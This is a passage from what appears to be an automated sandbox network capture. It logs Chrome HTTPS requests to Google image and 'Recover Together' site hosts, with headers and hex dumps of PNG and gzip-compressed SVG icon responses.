                                                                                                                                                                                                                                                                                          112192.168.2.749888142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC542OUTGET /rqSGi625g53oF9X58-LG_7kghfxLypCKXdx1c25r2ypmii0f5DcFeQe2baMC4u_0gwknLaADlUhdK3Pq-g2a69MwPBVjlyMLbIKr1A=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1307909
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:48 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:48 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2273
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 31 37 3a 30 34 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:17:04
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 39 65 63 35 33 66 66 31 2d 39 65 65 65 2d 34 36 30 65 2d 62 64 65 30 2d 62 33 34 65 35 35 32 31 66 38 37 33 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 39 61 64 37 63 61 63 2d 61 38 62 66 2d 65 37 34 33 2d 39 33 35 39 2d 32 61 61 35 62 35 34 66 65 37 36 39
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:9ec53ff1-9eee-460e-bde0-b34e5521f873</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:29ad7cac-a8bf-e743-9359-2aa5b54fe769
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 01 d8 a0 3c f2 df 7e af 66 ec f3 73 16 b4 03 eb 8c 53 fb 5f c8 13 b8 11 df 31 90 a0 5f b5 bf 68 3f eb 13 ad e8 41 8e 32 fe 53 fd 31 75 11 4d ae 3b 9e 74 fe 61 41 d5 42 73 f6 c4 dc f7 d0 16 cb aa 43 3f 31 dc f9 fe 3c e6 cb 77 9e 71 97 d7 e7 28 c3 ce 1b 9d a1 40 ef e5 2d 63 73 cc 25 f4 6c 3e 53 ff 9c 9f fa 1b be 00 75 bd 08 26 d6 eb 2f 5f be fc f5 35 af 4f 9f f3 0a c6 2f 71 88 33 b6 29 ac d9 1d 67 3c bc 51 b0 c2 fd 24 cf d9 eb 84 bf 68 39 93 5f ac 87 d5 90 1a 48 8b 73 30 d2 d7 98 24 5e 68 0d fd b9 2c 0f f4 ae 13 cf 1c c4 65 51 b6 ef 21 37 62 73 31 c4 d8 25 8c ad bd 86 6f 7f cf d5 75 b0 8a 71 75 2e 2f 8a a8 c3 f7 ea 9a 78 66 ef ca 36 6e 37 86 82 c1 de 63 4c a1 43 d9 72 da 5c da a5 53 fb 89 6b d6 ce 8b b6 4c 9c c7 5c e7 fc dd f1 d3 eb 43 6c c7 87 4f 3b 3f ee
                                                                                                                                                                                                                                                                                          Data Ascii: <~fsS_1_h?A2S1uM;taABsC?1<wq(@-cs%l>Su&/_5O/q3)g<Q$h9_Hs0$^h,eQ!7bs1%ouqu./xf6n7cLCr\SkL\ClO;?
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: d9 f1 de 7c 60 ec dc a8 66 3f 03 8d ad 26 dc ae 71 59 cc 7e b0 a3 87 c2 66 31 af ef 9c 99 63 92 b3 7f 71 39 a9 4e 13 c1 4d 30 e3 4f 0a e4 40 17 bc 3f f3 50 26 3f 54 21 6e ce 74 c3 ac 39 7b 83 32 3f e1 53 0e 9b b9 b9 0f 8e 55 35 ca 94 17 6d 3a ce f9 f9 f2 01 a0 60 b1 89 9e f2 77 f5 15 4c 30 95 b6 78 65 1f 9c e5 78 71 8c ae f5 a1 98 f0 a1 36 bc 91 8f 12 d7 a2 9c d5 fb 42 c5 9f 90 8a e9 f6 55 9f 6f a0 7f a2 ea e2 65 ae 6e f9 57 30 ae cc 9e 89 03 71 35 0e 8c ff 53 8c b0 46 3a d1 ef b5 89 00 fa 20 2c 1d b9 b9 fa f2 e5 6f 52 43 1d ea 24 97 c8 98 cb cf 66 cf 83 3d 2f b8 a5 cb 9a 03 0f 11 3e 7f 6d ac 78 d3 80 9c 6e 9e ce 18 a5 ed 8d 76 f4 82 e9 d6 97 c6 16 b0 e7 5e c8 3e 30 2f fd 17 67 2e af f0 11 03 56 51 a6 06 6b 2c 3a 94 cf 7e 80 87 62 9f 7e e6 d1 5a 78 c9 5f
                                                                                                                                                                                                                                                                                          Data Ascii: |`f?&qY~f1cq9NM0O@?P&?T!nt9{2?SU5m:`wL0xexq6BUoenW0q5SF: ,oRC$f=/>mxnv^>0/g.VQk,:~b~Zx_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 9c 71 85 9b 96 27 f2 d5 3c 3b c0 c1 e6 ab bf 39 e5 87 71 84 67 f2 c7 4e 9a 28 88 3d cf 54 61 8a 7f c4 3f 1f b6 b0 8f b6 63 ef 3d 44 fa 1d eb 82 ac 5e a4 f3 06 06 24 ba f3 d3 07 ae dc 4c 93 67 7c ce 2b d4 ec f5 ae eb 20 12 8c 99 c6 11 ca be b0 e2 62 45 ae 05 dd bc 84 35 fc 36 73 18 9f c2 7b b1 4f 97 7a 91 01 4b 8e 7e 2a 8b 3e e6 41 d5 c9 d9 f1 82 50 0d e6 d0 d4 c9 68 62 be 05 8e bb 85 44 29 fa 95 ba 53 64 e7 03 42 32 df 12 77 ed d6 84 7d 6c 5e 67 c4 32 2f 1c 86 60 9d 08 a1 2d 1d d5 40 7c 1f 80 60 7b 26 a2 0f b5 82 b9 f1 57 48 b1 6b 9e aa a6 bb 7f 50 80 99 39 83 4e da 6f 8a 26 6f e4 ed 7f e6 8c 7d ef 4d 8b fb 4b fc 69 18 2a 47 9c 8c 2b 7e f2 c0 2f 9d ce 6f 9d ec 3d 01 7a cd fd 01 d0 c7 a1 71 13 7c 6b 1e 59 64 70 86 18 81 38 bf 60 27 66 14 43 94 83 a9 eb 9a
                                                                                                                                                                                                                                                                                          Data Ascii: q'<;9qgN(=Ta?c=D^$Lg|+ bE56s{OzK~*>APhbD)SdB2w}l^g2/`-@|`{&WHkP9No&o}MKi*G+~/o=zq|kYdp8`'fC
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 47 28 93 8d 25 63 e1 e6 8d ad fc 90 db 0c 36 9f 9e f2 06 69 05 05 27 04 60 54 81 e7 64 5d 78 b8 95 c6 d3 de ec a5 3b 3a f0 d3 9e bd a1 6b 28 90 7a 2a e4 a7 5a a3 9b 44 2b f6 b2 37 a7 f7 21 65 8d c0 db 35 a0 8a d2 1e 9c 1b 5b f6 0f 0f e6 aa 5e 76 9e 6f 7c 06 9b 34 0e b1 a1 fd 32 6d 1c 95 9f 03 dd 63 a2 26 73 ac ad ee b9 f0 93 5f be e9 d0 4f 34 55 17 e2 dd cb 5c 62 d7 38 a1 0f 5b fd aa dc dd ff 50 8b 3e 75 30 d6 e9 70 69 c8 79 31 2e ef 73 bb 74 62 84 f4 b4 1c 13 bc 8d 26 fc c7 7e 0e 22 c5 bf b0 c9 7d 8b 44 7e 68 e9 f3 d3 6c bb 10 2d 2f e7 f0 f8 30 33 d2 bc c1 c1 58 7d cd 43 1f e8 ac 3d 3f f3 29 55 c6 97 3d e0 3e 0c 48 97 f6 19 07 67 3d 84 bc fa 00 87 87 00 59 37 d9 7b b2 8e c6 26 5f db 44 47 f3 24 0f 18 1c 60 a3 5e dc 38 83 ce d8 db 47 34 c4 04 fc 1c 38 a5
                                                                                                                                                                                                                                                                                          Data Ascii: G(%c6i'`Td]x;:k(z*ZD+7!e5[^vo|42mc&s_O4U\b8[P>u0piy1.stb&~"}D~hl-/03X}C=?)U=>Hg=Y7{&_DG$`^8G48
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 36 78 c8 a7 3e b8 e1 da 0d 5e 0c 15 9f e3 15 3d a0 e6 a6 9d 7d 8d 57 fc e4 96 7f b3 d0 8c c1 23 e6 42 b8 f3 dd 2d 5a c8 91 eb c4 89 a2 3c b6 f2 e2 66 cd 87 01 a1 b3 47 d8 72 8e 1d 39 c6 0f 0a d0 e1 83 11 61 e1 cc 21 b4 c2 d7 f9 6d 1f 36 18 3d 0a 47 43 80 9a a1 51 2d 4f 28 da 98 b8 c1 92 b2 31 21 2c db e6 0c 2e 48 e8 ec 27 75 b0 d2 17 fd cc eb b3 ac ee 22 21 7e f4 b6 e5 2a 60 30 aa b1 79 d2 71 92 23 64 70 a3 93 b5 87 62 7c 3c a7 0e 98 50 78 1b 83 c2 03 19 fe 9e 9d 74 ba 92 27 bd 09 ce f5 8a f8 a7 4f fc 59 f7 a5 27 e7 d0 07 2b 39 25 36 ee 2b f8 34 19 0a 29 cc db 69 a8 23 fc fc 3d 68 46 5c b2 c2 8c 57 5e e1 15 43 ea de c0 e7 6f 59 c2 b7 c5 58 a6 09 6f fd 60 cf d3 7e 9e 43 13 2b 24 f0 17 f2 43 de 4c 1b 5d 2b b3 7a 39 13 41 ca 35 a6 6d de 47 18 6a ca 5c a4 01
                                                                                                                                                                                                                                                                                          Data Ascii: 6x>^=}W#B-Z<fGr9a!m6=GCQ-O(1!,.H'u"!~*`0yq#dpb|<Pxt'OY'+9%6+4)i#=hF\W^CoYXo`~C+$CL]+z9A5mGj\
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: ef 5a 0d 63 6d 50 5b 9c d6 09 10 88 94 81 8b 6a 63 00 6d fb 04 4d 0b 80 94 74 89 27 b1 59 9a ed f6 de 34 7c 5a 1a ea 28 e6 c3 c8 97 92 23 5c bc 86 e9 c2 7d 31 dc 95 e0 12 19 d7 97 06 cc b3 0f 84 c5 95 f8 47 95 50 61 0c 3f eb 15 b4 ca 11 e7 36 6e cc c4 8d 4f 00 b1 d6 26 2b d0 23 1e cc 86 17 6a 68 d4 ba fe 7e cf 3f a6 c9 2a c6 27 ad c2 ac ba 30 a0 f7 7c ad 3d b4 f4 06 31 ec 9b 37 10 53 c8 b5 fb 93 66 e8 c0 10 81 05 03 59 9e 3c 87 87 1f 14 d2 0d 08 c0 a4 8f 82 1f 5c 15 e1 01 b7 6b 82 c6 33 67 07 38 0f 4b f9 84 1d 4d 3f b9 82 93 23 4b 6d 1f fe 41 53 35 15 8a 7c 43 49 1d dd ee a5 d2 55 dc 77 be e2 3b 58 8c 81 fd d1 1b 83 4b 43 1d 7d 09 5c 3f 9d 86 6f f1 95 17 8e 7d 45 7f 6a b4 28 5e 8b a4 15 eb ea a7 cf 6b 61 fa 78 48 d3 79 0d 35 11 88 7e e5 4d 83 c1 93 9e 58
                                                                                                                                                                                                                                                                                          Data Ascii: ZcmP[jcmMt'Y4|Z(#\}1GPa?6nO&+#jh~?*'0|=17SfY<\k3g8KM?#KmAS5|CIUw;XKC}\?o}Ej(^kaxHy5~MX
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC1390INData Raw: 8f c2 f9 d0 94 76 62 10 43 d7 03 b2 d4 b9 09 6a 7e 52 df 0d 28 f3 8b 6b 79 35 f5 38 7c 99 90 6e 52 dd 58 8f fd d4 8b 3f 9c 81 51 fe fb 0c 32 68 5d 6f 3b d6 b4 59 33 9b 5f 37 76 14 d8 82 81 0d 78 4e 14 75 62 a4 60 4b 94 ce 66 1b fb 72 5c f4 97 95 6b 6d 55 79 f5 73 51 4e a9 af a9 cf 03 d2 47 f9 1b 07 78 c0 8c bd 3e 94 a9 1f f0 9b c3 83 ef c2 33 a6 ae f6 2a 8e 22 ba 02 5d 1f f5 b3 50 fa 75 6f 15 56 e7 8a f4 2c 27 92 8f e4 a3 e5 4d d7 70 b8 3e 38 56 f5 81 e8 fe 9d 07 73 ac bf f8 ec 43 8f f0 32 da 50 68 73 d9 80 c2 cd 0e f1 86 8f 29 6b 4e f8 a9 c0 d0 64 02 4b f1 f0 a0 af b5 70 27 47 fe ce 7f 3e e4 3f 53 53 76 5e 51 df 87 52 d2 77 cc 10 d4 3c 31 4d 23 2f 75 19 4b 3a a0 85 25 fc bc bc 46 8a 09 7e 76 9c b1 c0 b8 81 95 71 c1 5f f1 c1 9f 4f 28 e5 41 84 0f 76 a2 aa
                                                                                                                                                                                                                                                                                          Data Ascii: vbCj~R(ky58|nRX?Q2h]o;Y3_7vxNub`Kfr\kmUysQNGx>3*"]PuoV,'Mp>8VsC2Phs)kNdKp'G>?SSv^QRw<1M#/uK:%F~vq_O(Av


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          113192.168.2.749892172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC424OUTGET /static/images/maps/select_arrow.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 668395191437aa57032675118fb8764e
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 161
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC161INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 34 cc 41 0e 83 20 14 04 d0 bd a7 f8 f9 dd c3 07 6c 8d 8d b8 e8 aa 0b 7b 81 ee 9a 48 85 04 c1 54 22 1e bf d2 a4 99 dd 4c e6 75 eb 36 41 76 63 b2 1a 25 21 58 e3 26 9b 34 0a 89 b0 39 93 6f 71 d7 48 40 20 09 4a f7 76 de 6b 0c 31 18 84 7d f6 61 d5 68 53 5a ae 9c e7 9c 59 56 2c 7e 26 2e 89 88 1f 30 f6 55 b7 bc 92 85 51 e3 43 14 60 10 2d 3b cb 8b 02 ba 13 ab 1b d5 48 31 fc 86 e7 9f 3e d5 6d 09 f2 e3 5b 8c be fa 02 00 00 ff ff 03 00 2d d6 65 bb a3 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: 4A l{HT"Lu6Avc%!X&49oqH@ Jvk1}ahSZYV,~&.0UQC`-;H1>m[-e


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          114192.168.2.749895172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC427OUTGET /static/images/icons/cta-arrow-down.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 6f0766b078035e513f585b8716488183
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 660
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC660INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 8c 54 db 6e a3 30 10 7d ef 57 78 bd 2f ad 84 8d cd c5 40 05 a9 ba d9 b6 2f e9 aa da 8b 54 f5 05 21 70 13 14 8a 23 70 93 ec df ef 40 a0 90 6c 58 ad 15 29 9e 99 33 e7 cc d8 83 c3 9b fd 5b 81 b6 b2 aa 73 55 46 98 53 86 91 2c 53 95 e5 e5 32 c2 bf 7e de 13 1f df cc 2e c2 7a bb 44 bb 3c d3 2b c0 f8 9b 3d 46 2b 99 2f 57 ba b7 b6 b9 dc 7d 51 fb 08 33 c4 10 f7 e1 87 c7 a4 1c 23 90 29 eb 08 af b4 de 5c 9b e6 6e b7 a3 3b 9b aa 6a 69 5a 8c 31 13 e8 3b c8 f5 be c8 cb f5 39 20 0f 82 c0 6c a3 78 76 81 60 85 9f 08 41 0f b2 94 55 a2 55 75 8d 7e ac a5 4e 57 c8 15 d4 46 97 3e f7 b8 b8 42 04 35 8a 35 48 d6 6d 94 a6 ea 0d 11 d2 11 e8 5c 17 72 96 a7 b1 dc 6f 92 32 8b 93 a2 88 bf cb 5a 43 f3 71 d3 66 68 1e 10 07 b9 4c d6 e9 6c 5e c9 44 cb 0c 0e 43
                                                                                                                                                                                                                                                                                          Data Ascii: Tn0}Wx/@/T!p#p@lX)3[sUFS,S2~.zD<+=F+/W}Q3#)\n;jiZ1;9 lxv`AUUu~NWF>B55Hm\ro2ZCqfhLl^DC


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          115192.168.2.749897172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC428OUTGET /static/images/icons/accordion-arrow.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: fc0392e488319aaa8c192175390e1e4d
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 450
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC450INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 7c 52 c1 6e 9c 30 10 bd e7 2b a6 ce 25 91 6a 83 21 d9 35 2b 20 6a aa b6 f7 6e 7b 5e 11 70 c0 5a d6 46 b6 bb b0 fd fa 1a 63 9a 28 6a 33 07 98 99 37 7a 6f 66 3c f9 c3 74 ea e1 cc b5 11 4a 16 88 92 18 01 97 b5 6a 84 6c 0b f4 f3 c7 57 cc d0 43 79 95 9b 73 0b a3 68 6c e7 6a d8 30 21 e8 b8 68 3b eb a2 64 8e ce 82 8f 8f 6a 2a 50 0c 31 50 06 34 71 b9 17 52 8a c0 c9 48 53 a0 ce da 61 17 45 e3 38 92 31 25 4a b7 51 12 c7 71 e4 e8 43 c9 6e ea 85 3c fe ab 90 66 59 16 79 14 95 57 e0 2c ff 80 31 7c e3 92 eb ca 2a bd 83 fd 91 db ba 83 fb 0d 49 e1 86 d1 2d dd dc 02 86 59 d1 38 49 e3 51 52 ab 13 60 1c 08 ac b0 3d 2f 45 7d 38 f2 cb 93 aa 74 73 a8 b4 56 e3 e1 3b 37 d6 2d e0 90 6e 86 29 8f 96 aa 45 b2 e1 a6 2e 3f 6b 5e 59 de b8 85 d8 2e a8 92 3c
                                                                                                                                                                                                                                                                                          Data Ascii: |Rn0+%j!5+ jn{^pZFc(j37zof<tJjlWCyshlj0!h;dj*P1P4qRHSaE81%JQqCn<fYyW,1|*I-Y8IQR`=/E}8tsV;7-n)E.?k^Y.<


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          116192.168.2.749898172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC433OUTGET /static/images/icons/youtube_play_default.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
